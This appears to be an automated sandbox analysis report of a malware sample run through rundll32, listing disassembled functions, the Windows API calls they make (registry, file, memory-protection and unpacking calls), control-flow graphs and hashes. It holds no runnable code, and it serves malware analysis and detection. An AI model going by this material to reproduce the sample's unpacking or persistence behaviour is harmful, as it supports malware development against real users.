    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Startup
    • String ID:
    • API String ID: 724789610-0
    • Opcode ID: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction ID: d74f7e4fc3d2271a8ab4d4adfaa925da7f5db712bb5ec264062f05ece0e1d290
    • Opcode Fuzzy Hash: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction Fuzzy Hash: 7C8184F6A402025BF740CB68DCC1BAA73E9EF583A4F290075E9059B345E679BD15C722
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000A7B0 Relevance: 16.7, APIs: 11, Instructions: 162registrystringCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A7EE
    • strrchr.MSVCRT ref: 1000A817
    • RegOpenKeyA.ADVAPI32(00000000,00000000,?), ref: 1000A830
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A853
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000400,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A876
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A884
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A88E
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000), ref: 1000A8AB
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8DA
    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A8E7
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8EE
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: ??2@??3@$QueryValue$CloseOpenstrrchr
    • String ID:
    • API String ID: 1380196384-0
    • Opcode ID: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction ID: b054589480694306ed07ebfcb3a54d079748cc68523788b519db9fcbf24356dc
    • Opcode Fuzzy Hash: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction Fuzzy Hash: A04106756003055BF314DB689C45E2B77D8EFC12E0F144A2DFA55C3285EE76ED0A83A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000B390 Relevance: 13.6, APIs: 9, Instructions: 113librarywindowstringCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 689 1000b390-1000b3ac GetModuleHandleA 690 1000b40b-1000b415 689->690 691 1000b3ae-1000b3b9 LoadLibraryA 689->691 694 1000b427-1000b45d strchr 690->694 695 1000b417-1000b425 atoi 690->695 692 1000b3eb-1000b3f9 691->692 693 1000b3bb-1000b3e8 wsprintfA MessageBoxA call 10009390 691->693 697 1000b405-1000b406 692->697 698 1000b3fb 692->698 693->692 700 1000b468 694->700 701 1000b45f-1000b463 694->701 699 1000b46f-1000b47b GetProcAddress 695->699 697->690 698->697 704 1000b4c6-1000b4db 699->704 705 1000b47d-1000b4a6 wsprintfA MessageBoxA call 10009390 699->705 700->699 701->700 703 1000b465 701->703 703->700 707 1000b4ab-1000b4c3 705->707
    APIs
    • GetModuleHandleA.KERNEL32(?), ref: 1000B3A2
    • LoadLibraryA.KERNEL32(?), ref: 1000B3AF
    • wsprintfA.USER32 ref: 1000B3C6
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B3DC
      • Part of subcall function 10009390: ExitProcess.KERNEL32 ref: 100093A5
    • atoi.MSVCRT ref: 1000B41B
    • strchr.MSVCRT ref: 1000B453
    • GetProcAddress.KERNEL32(00000000,00000040), ref: 1000B471
    • wsprintfA.USER32 ref: 1000B489
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B49F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Messagewsprintf$AddressExitHandleLibraryLoadModuleProcProcessatoistrchr
    • String ID:
    • API String ID: 3187504500-0
    • Opcode ID: 1e74c7f77422cecd63aab9e311876e558fdabb2abce9660980f53871a6bc04ee
    • Instruction ID: 491f2c0a62f37e4f67161009499e29b69e0f741f7a8c9d6e7004f4b75a98df72
    • Opcode Fuzzy Hash: 1e74c7f77422cecd63aab9e311876e558fdabb2abce9660980f53871a6bc04ee
    • Instruction Fuzzy Hash: FC314AB26007555FF320EF24DC84B9B7B98EB85380F004929FB0993246EB75E909CBB5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100096A0 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • CreateFileA.KERNELBASE(80000004,80000000,00000003,00000000,00000003,00000020,00000000,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096B5
    • GetFileSize.KERNEL32(00000000,10069CDF,?,00000268,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096CC
      • Part of subcall function 10009430: GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
      • Part of subcall function 10009430: RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
      • Part of subcall function 10009430: MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    • ReadFile.KERNELBASE(00000000,00000008,00000000,?,00000000,00000001), ref: 100096F8
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 100096FF
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: File$Heap$AllocateChangeCloseCreateFindMessageNotificationProcessReadSize
    • String ID:
    • API String ID: 4143106703-0
    • Opcode ID: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction ID: cdbe4ea1d30985889301e2374bea63683511f888104e621f128e3cfb89859431
    • Opcode Fuzzy Hash: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction Fuzzy Hash: 37F04476201310BBF3119F64DCC9FAB77BCEB84B90F104A1EF646961D5E670A5058771
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10009430 Relevance: 4.5, APIs: 3, Instructions: 25memorywindowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 916 10009430-10009437 917 10009444-10009457 RtlAllocateHeap 916->917 918 10009439-1000943f GetProcessHeap 916->918 919 10009475-10009478 917->919 920 10009459-10009472 MessageBoxA call 10009390 917->920 918->917 920->919
    APIs
    • GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
    • RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
    • MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Heap$AllocateMessageProcess
    • String ID:
    • API String ID: 2992861138-0
    • Opcode ID: ad4a4f6ef7c16550fb0ea6375233d6a0664593d262914b5985d026670057f814
    • Instruction ID: ca495d503fa8b24896a3a0ddeaa4d588f6ba14c0d85a12038cb70845f0cd2cd9
    • Opcode Fuzzy Hash: ad4a4f6ef7c16550fb0ea6375233d6a0664593d262914b5985d026670057f814
    • Instruction Fuzzy Hash: 59E0D8B56401317BF310FB609C49F8A7698DB057C1F014015FD05D6154E774D8018B71
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100835C2 Relevance: 3.2, APIs: 2, Instructions: 209memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1015 100835c2-100835e1 call 10083882 1018 100835ed-100835f4 1015->1018 1019 100835e3-100835eb 1015->1019 1021 100835f7-100835fa 1018->1021 1020 10083603-1008361d 1019->1020 1024 10083624-1008362b 1020->1024 1022 100835fc-10083600 1021->1022 1023 10083632-10083658 VirtualFree 1021->1023 1022->1020 1025 10083699-100836aa call 100837d8 1023->1025 1026 1008365a-1008365d 1023->1026 1024->1023 1029 1008362d-10083630 1024->1029 1034 100836b0-100836b5 1025->1034 1035 10083731-10083743 1025->1035 1027 1008365f-10083661 1026->1027 1027->1026 1030 10083663-10083669 1027->1030 1029->1021 1032 1008366b-1008366f 1030->1032 1033 1008367f-10083687 1030->1033 1032->1026 1036 10083671-1008367d 1032->1036 1037 10083689-10083697 1033->1037 1034->1035 1040 100836b7-100836ca 1034->1040 1038 10083784-10083793 1035->1038 1039 10083745-1008375e 1035->1039 1036->1037 1037->1025 1037->1027 1043 100837bd-100837c5 1038->1043 1044 10083795-1008379c 1038->1044 1050 10083921-10083929 1039->1050 1051 10083764-1008377d 1039->1051 1041 100836cc-100836d4 1040->1041 1042 100836d6-100836db 1040->1042 1049 100836de-100836e5 1041->1049 1042->1049 1046 100837d1-100837d2 1043->1046 1047 100837c7-100837ce 1043->1047 1045 1008379e-100837bb VirtualProtect 1044->1045 1045->1043 1045->1045 1046->1050 1052 10083707-10083710 1049->1052 1053 100836e7-100836e9 1049->1053 1051->1038 1052->1035 1054 10083712-10083715 1052->1054 1055 100836eb-100836ef 1053->1055 1056 100836f1-100836fe 1053->1056 1058 1008371f-10083721 1054->1058 1059 10083717-1008371d 1054->1059 1055->1049 1056->1055 1057 10083700-10083705 1056->1057 1057->1055 1061 10083724-10083727 1058->1061 1059->1054 1061->1035 1062 10083729-1008372f 1061->1062 1062->1061
    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 1008363F
    • VirtualProtect.KERNELBASE(?,?,7373652D,73736297,?,7373652D,00000000,73736297), ref: 100837AE
    Memory Dump Source
    • Source File: 00000004.00000002.321187702.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10080000_rundll32.jbxd
    Similarity
    • API ID: Virtual$FreeProtect
    • String ID:
    • API String ID: 2581862158-0
    • Opcode ID: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction ID: cbfd066a6669cc03ceefd0d281f04ad6062c5cf2e557b09b294620d1cb926219
    • Opcode Fuzzy Hash: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction Fuzzy Hash: C5612572E04210AFDB21CA18CC847AAB7A1FFC5350F74C4A6D8899B391E775AD92CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100094C0 Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1063 100094c0-100094cb 1064 10009506-10009507 1063->1064 1065 100094cd-100094d4 1063->1065 1066 100094d6 call 10009360 1065->1066 1067 100094db-100094e1 1065->1067 1066->1067 1068 100094e3-100094e9 1067->1068 1069 100094eb-100094f6 IsBadHugeReadPtr 1067->1069 1068->1064 1068->1069 1069->1064 1071 100094f8-10009500 RtlFreeHeap 1069->1071 1071->1064
    APIs
    • IsBadHugeReadPtr.KERNEL32(10009B89,00000008), ref: 100094EE
    • RtlFreeHeap.NTDLL(1006A1D4,00000000,10009B89), ref: 10009500
      • Part of subcall function 10009360: GetModuleHandleA.KERNEL32(1006A1C0,10009536,?,?,?,100081F5,00000001,?,?,?,00000000), ref: 1000936A
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: FreeHandleHeapHugeModuleRead
    • String ID:
    • API String ID: 3105250205-0
    • Opcode ID: ca834bc4244fce640a793ff6be1dd1a44b6c0ac53575205badff9968adfb3274
    • Instruction ID: f4d6e6dfc0ea5ddfd767db067c6581f7df8aba6c1037937aeb9ef0df71b1f4fd
    • Opcode Fuzzy Hash: ca834bc4244fce640a793ff6be1dd1a44b6c0ac53575205badff9968adfb3274
    • Instruction Fuzzy Hash: 47E01231E0253297F621FB179C88A4A77D9EB477D1F014016F545A7058D374AC818FA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 001F05A9 Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 001F0625
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 001F0658
    Memory Dump Source
    • Source File: 00000004.00000003.311864524.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_3_1f0000_rundll32.jbxd
    Similarity
    • API ID: Virtual$AllocFree
    • String ID:
    • API String ID: 2087232378-0
    • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction ID: de82e9e876a93baff0b7a550c426a4a9b1adb8e3eb28e1760b978d67ff63f0db
    • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction Fuzzy Hash: D9212635A0021DBFDB018F60CC40BFEFBB5EB58394F20C122EA10A2291E7B08A119B50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10009390 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2969 10009390-1000939f call 10009330 2972 100093a1-100093a5 ExitProcess 2969->2972 2973 100093ad-100093bf 2969->2973
    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: ExitProcess
    • String ID:
    • API String ID: 621844428-0
    • Opcode ID: 808f9db0dc529ccc6febb549eafa899a22df3bfee1d1e0ee509ec620f588b9fb
    • Instruction ID: 83411d840e5b6f42aa8eb0b9e9c873287c900da43e5ea80d46ae5ad2abf97bab
    • Opcode Fuzzy Hash: 808f9db0dc529ccc6febb549eafa899a22df3bfee1d1e0ee509ec620f588b9fb
    • Instruction Fuzzy Hash: 4CD09E785002559BE700FF69C98554A37A9B706680F808014ED558B355E674FA948FA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10009710 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2974 10009710-10009720 SetFileAttributesA
    APIs
    • SetFileAttributesA.KERNELBASE(00000000,00000002,10007744,00000002,00000000,00000000,80000004,00000002,00000000,80000301,00000000,10069CE3,10069CDB,100695C2,00000000), ref: 1000971A
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction ID: ba1b9f9736472015c9caeb0e2b2585a1f4e95ecc7d51d8cd3f73c6f4105449ec
    • Opcode Fuzzy Hash: 2708e965b174b85047c8d0145172c59c26a25c7f0d4e6f625563eef8cc2badcf
    • Instruction Fuzzy Hash: 7EB092B4104201ABDA04DB10C984D2A77A8AB84280F004848B44982110C630D844CA32
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10083555 Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 2975 10083555-10083567 2976 10083569-10083575 2975->2976 2977 1008357b-100835b1 VirtualAlloc 2975->2977 2976->2977 2978 100837bd-100837c5 2976->2978 2979 10083921-10083929 2977->2979 2980 100835b7-100835bd call 100835c2 2977->2980 2981 100837d1-100837d2 2978->2981 2982 100837c7-100837ce 2978->2982 2980->2979 2981->2979
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 100835A9
    Memory Dump Source
    • Source File: 00000004.00000002.321187702.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10080000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction ID: 0e55dd4c9f7470d52eab4346b396aa946e407808a0d127f0e42209d590d0d6a2
    • Opcode Fuzzy Hash: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction Fuzzy Hash: 97F04F35D483688BDF61CE248C0C7D9BBB0AB40340F0144D9E9C977295D6B46EC68F54
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 1000AE00 Relevance: 27.4, APIs: 18, Instructions: 426windowstringCOMMON
    Download Yara Rule
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,1006A2E0,00000104), ref: 1000AE7E
    • strrchr.MSVCRT ref: 1000AE8F
    • _ftol.MSVCRT ref: 1000AFCE
    • GetCommandLineA.KERNEL32 ref: 1000AFF4
    • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 1000B061
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000B093
    • TranslateMessage.USER32(?), ref: 1000B09A
    • DispatchMessageA.USER32(?), ref: 1000B0A1
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000B0B0
    • wsprintfA.USER32 ref: 1000B2F3
    • MessageBoxA.USER32(00000000,?,1006A018,00000010), ref: 1000B30A
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Message$Peek$CommandDispatchFileLineModuleNameTranslate_ftolstrrchrwsprintf
    • String ID:
    • API String ID: 3335176381-0
    • Opcode ID: 92a5994cca1b7ef60fe66651f58af9c9c81d6aabc4c705b83f258a490ed8930e
    • Instruction ID: 550dcc155c2af2a742ea6bd1faa3485fa46c40cd6c1f5de1c3546930abff5cc3
    • Opcode Fuzzy Hash: 92a5994cca1b7ef60fe66651f58af9c9c81d6aabc4c705b83f258a490ed8930e
    • Instruction Fuzzy Hash: 48C139377849044AF320E668BC41BFFB781E7D13F2F50053BEA05CA1D4D96BA949CA66
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000C440 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97COMMON
    Download Yara Rule
    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,?,00000000), ref: 1000C4CB
    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1000C4EA
    • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 1000C501
    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1000C518
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: DirectoryPath$FolderSpecialSystemTempWindows
    • String ID: \$\
    • API String ID: 2721284240-164819647
    • Opcode ID: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction ID: 77cbe7fce8ef9562389d15453b58eba8ebe27cca9de610a2ae966a0e19f657af
    • Opcode Fuzzy Hash: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction Fuzzy Hash: 7F3103B550874A9BF720C728CC95F6E36D0E7417C0F20891AF585C60D9E6B4E88097A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000A370 Relevance: 7.7, APIs: 6, Instructions: 208COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction ID: 997e975f8056afc4703edd2e8b222d0f39c38b45864d1c521b5624a5b2537b3b
    • Opcode Fuzzy Hash: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction Fuzzy Hash: 69514A756046054BF738C6248C42AEF73D5EBC23A0F248B2DFA55C31D8EE7AD9858392
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000BAB0 Relevance: 6.1, APIs: 4, Instructions: 87COMMON
    Download Yara Rule
    APIs
    • malloc.MSVCRT ref: 1000BB13
    • LCMapStringA.KERNEL32(00000804,00400000,?,?,00000000,?,?,?,100695CA,?,00000000,00000000,?,10009E2B,00000001,00000000), ref: 1000BB47
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB56
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB74
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: ??3@$Stringmalloc
    • String ID:
    • API String ID: 1006641717-0
    • Opcode ID: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction ID: c44458945b11d331972013727580eba0770bfaca40fb43e82456e2fbb398e2da
    • Opcode Fuzzy Hash: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction Fuzzy Hash: ED1105762046043BE218DA799C42E6B73CADBC42A1F10462DF226922C5DE72ED054765
    Uniqueness

    Uniqueness Score: -1.00%

    Execution Graph

    Execution Coverage:3%
    Dynamic/Decrypted Code Coverage:1.1%
    Signature Coverage:25.2%
    Total number of Nodes:1076
    Total number of Limit Nodes:52
    execution_graph 57966 40a860 57967 40a86c 57966->57967 57968 40a896 57967->57968 57976 483330 57967->57976 58020 40b7d0 57968->58020 57970 40a883 57984 40ba00 57970->57984 57973 40a88d 58015 4832c2 57973->58015 57977 483344 57976->57977 57983 483357 ctype 57976->57983 57978 483359 lstrlen 57977->57978 57979 48334e 57977->57979 57980 483366 57978->57980 57978->57983 58023 488ab3 66 API calls ctype 57979->58023 58024 48312f 31 API calls ctype 57980->58024 57983->57970 58025 483854 57984->58025 57986 40ba2e 58028 4839c2 57986->58028 57988 40bafb 57989 483905 ctype 39 API calls 57988->57989 57990 40bb07 57989->57990 58064 483892 23 API calls 57990->58064 57991 40ba57 57991->57988 57992 40ba76 57991->57992 57993 40bac7 57991->57993 58041 40b5f0 57992->58041 57995 40b7d0 2 API calls 57993->57995 57998 40bace 57995->57998 57996 40ba7e 57996->57988 57999 40ba82 57996->57999 58001 483905 ctype 39 API calls 57998->58001 58050 483adf 57999->58050 58000 40bb24 58004 40b7d0 2 API calls 58000->58004 58002 40bada 58001->58002 58063 483892 23 API calls 58002->58063 58007 40bb2b 58004->58007 58007->57973 58008 40bae6 58008->57973 58009 40ba9a 58055 483905 58009->58055 58014 40bab2 58014->57973 58016 4832ea 58015->58016 58017 4832d2 InterlockedDecrement 58015->58017 58016->57968 58017->58016 58018 4832e0 58017->58018 58167 4831b1 31 API calls ctype 58018->58167 58168 40b7f0 58020->58168 58022 40a8c7 58023->57983 58024->57983 58065 48386a GetLastError 58025->58065 58027 483860 58027->57986 58092 48324d 58028->58092 58036 483aa8 58037 483acc 58036->58037 58038 483aaf GetLastError 58036->58038 58037->57991 58039 483abe ctype 58038->58039 58040 4833ff ctype 35 API calls 58039->58040 58040->58037 58042 40b5fc 58041->58042 58047 40b60c 58041->58047 58156 40b6c0 7 API calls 58042->58156 58044 40b606 58044->57996 58045 40b68a RtlAllocateHeap 58048 40b6a1 58045->58048 58046 40b67f GetProcessHeap 58046->58045 58047->58045 58047->58046 58049 40b614 58047->58049 58048->57996 58049->57996 58051 40ba8c 58050->58051 58052 483aec ReadFile 58050->58052 58051->58009 58061 40b6c0 7 API calls 58051->58061 58052->58051 58053 483b05 GetLastError 58052->58053 58157 488652 36 API calls ctype 58053->58157 58057 48390f __EH_prolog 58055->58057 58056 483934 58058 4832c2 ctype 32 API calls 58056->58058 58057->58056 58158 483bdd 58057->58158 58060 40baa6 58058->58060 58062 483892 23 API calls 58060->58062 58061->58009 58062->58014 58063->58008 58064->58000 58068 48cc47 58065->58068 58069 48cc7d TlsGetValue 58068->58069 58070 48cc50 58068->58070 58071 48cc90 58069->58071 58072 48cc6a 58070->58072 58089 48c847 RaiseException TlsAlloc RtlInitializeCriticalSection ctype 58070->58089 58076 48cca3 58071->58076 58077 483883 SetLastError 58071->58077 58079 48c8e0 RtlEnterCriticalSection 58072->58079 58075 48cc7b 58075->58069 58090 48ca4f 8 API calls ctype 58076->58090 58077->58027 58084 48c8ff 58079->58084 58080 48c9bb ctype 58081 48c9d0 RtlLeaveCriticalSection 58080->58081 58081->58075 58082 48c939 GlobalAlloc 58085 48c96e 58082->58085 58083 48c94c GlobalHandle GlobalUnWire GlobalReAlloc 58083->58085 58084->58080 58084->58082 58084->58083 58086 48c97c GlobalHandle GlobalFix RtlLeaveCriticalSection 58085->58086 58087 48c997 GlobalFix 58085->58087 58091 481443 RaiseException ctype 58086->58091 58087->58080 58089->58072 58090->58077 58093 48326a 58092->58093 58094 483255 58092->58094 58096 483cee 58093->58096 58095 4833ff ctype 35 API calls 58094->58095 58095->58093 58116 473304 58096->58116 58098 483cf8 GetFullPathNameA 58099 483d1b lstrcpyn 58098->58099 58100 483d2d 58098->58100 58101 4839fa 58099->58101 58117 483dbe 58100->58117 58111 4833ff 58101->58111 58104 483d5e 58106 483d6b 58104->58106 58107 483d64 CharUpperA 58104->58107 58105 483d9d 58108 4832c2 ctype 32 API calls 58105->58108 58106->58105 58109 483d71 FindFirstFileA 58106->58109 58107->58106 58108->58101 58109->58105 58110 483d86 FindClose lstrcpy 58109->58110 58110->58105 58112 48340b 58111->58112 58113 48340f lstrlen 58111->58113 58145 483382 58112->58145 58113->58112 58115 48341f CreateFileA 58115->58036 58115->58037 58116->58098 58124 4836a6 58117->58124 58119 483dd0 ctype 58120 483ddc lstrcpyn 58119->58120 58121 483def 58120->58121 58130 4836f5 58121->58130 58125 4836b9 58124->58125 58126 4836ed 58125->58126 58135 48312f 31 API calls ctype 58125->58135 58126->58119 58128 4836d0 ctype 58136 48322a 32 API calls ctype 58128->58136 58137 48326b 58130->58137 58132 4836fd 58133 48370e GetVolumeInformationA 58132->58133 58134 483706 lstrlen 58132->58134 58133->58104 58133->58105 58134->58133 58135->58128 58136->58126 58138 483277 58137->58138 58142 483286 ctype 58137->58142 58143 4831f9 32 API calls ctype 58138->58143 58140 48327c 58144 48312f 31 API calls ctype 58140->58144 58142->58132 58143->58140 58144->58142 58148 483299 58145->58148 58147 483390 ctype 58147->58115 58149 4832a9 58148->58149 58150 4832bd 58149->58150 58154 4831f9 32 API calls ctype 58149->58154 58150->58147 58152 4832b5 58155 48312f 31 API calls ctype 58152->58155 58154->58152 58155->58150 58156->58044 58157->58051 58159 483bf9 58158->58159 58160 483beb FindCloseChangeNotification 58158->58160 58161 48324d ctype 35 API calls 58159->58161 58160->58159 58162 483c09 58161->58162 58163 483c1d 58162->58163 58164 483c0f GetLastError 58162->58164 58163->58056 58166 488652 36 API calls ctype 58164->58166 58166->58163 58167->58016 58169 40b7fa 58168->58169 58170 40b84e 58168->58170 58171 40b844 RtlFreeHeap 58169->58171 58172 40b839 GetProcessHeap 58169->58172 58173 40b80e 58169->58173 58170->58022 58171->58170 58172->58171 58173->58022 58174 40a420 58175 40a463 58174->58175 58176 40a42b 58174->58176 58179 41b060 RtlAllocateHeap 58176->58179 58180 41b080 58179->58180 58182 40a434 58179->58182 58183 417df0 wsprintfA 58180->58183 58186 417e20 58183->58186 58187 417e5d 58186->58187 58188 483330 67 API calls 58187->58188 58190 417f26 58187->58190 58189 417e9d 58188->58189 58194 417edb 58189->58194 58216 41ef10 